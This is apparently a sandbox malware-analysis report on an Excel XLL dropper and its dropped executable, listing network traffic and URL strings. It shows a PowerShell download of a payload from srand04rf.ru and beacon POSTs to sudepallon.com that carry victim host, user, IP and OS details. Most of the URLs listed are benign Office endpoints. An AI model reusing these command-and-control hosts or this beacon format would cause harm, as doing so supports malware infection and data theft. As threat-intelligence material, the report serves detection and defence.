Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Source: C:\Users\Public\snd32sys.exe

16_2_00611FC0

Source: global traffic	HTTP traffic detected: GET /92375234.xml HTTP/1.1Connection: Keep-AliveHost: srand04rf.ru
Source: global traffic	HTTP traffic detected: GET /08.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: srand04rf.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: srand04rf.ru

Source: unknown

Source: snd32sys.exe	String found in binary or memory: http://api.ipify.org
Source: snd32sys.exe, 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp	String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
Source: 0708_5355150121.xll	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000002.00000003.226352766.0000000007D51000.00000004.00000001.sdmp, 0708_5355150121.xll	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: 0708_5355150121.xll	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: 0708_5355150121.xll	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: 0708_5355150121.xll	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: 0708_5355150121.xll	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 0708_5355150121.xll	String found in binary or memory: http://ocsp.comodoca.com0
Source: 0708_5355150121.xll	String found in binary or memory: http://ocsp.sectigo.com0
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png8
Source: powershell.exe, 00000002.00000002.348512770.0000000004B41000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.331698788.00000000048E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.333951627.0000000004CEF000.00000004.00000001.sdmp	String found in binary or memory: http://srand04rf.ru
Source: powershell.exe, 00000006.00000002.333971406.0000000004CF7000.00000004.00000001.sdmp	String found in binary or memory: http://srand04rf.ru/08
Source: PowerShell_transcript.888683.93l2YHGR.20210708163033.txt.6.dr	String found in binary or memory: http://srand04rf.ru/08.jpg
Source: powershell.exe, 00000006.00000002.332529239.0000000004AEB000.00000004.00000001.sdmp	String found in binary or memory: http://srand04rf.ru4&jt
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html8
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.office.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.onedrive.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://augloop.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cdn.entity.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cortana.ai/api
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cr.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://directory.services.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester8
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000006.00000003.320087365.000000000530E000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://graph.windows.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://graph.windows.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://login.windows.local
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://management.azure.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://management.azure.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://messaging.office.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://officeapps.live.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://onedrive.live.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://osi.office.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://outlook.office.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 0708_5355150121.xll	String found in binary or memory: https://sectigo.com/CPS0
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://settings.outlook.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://tasks.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
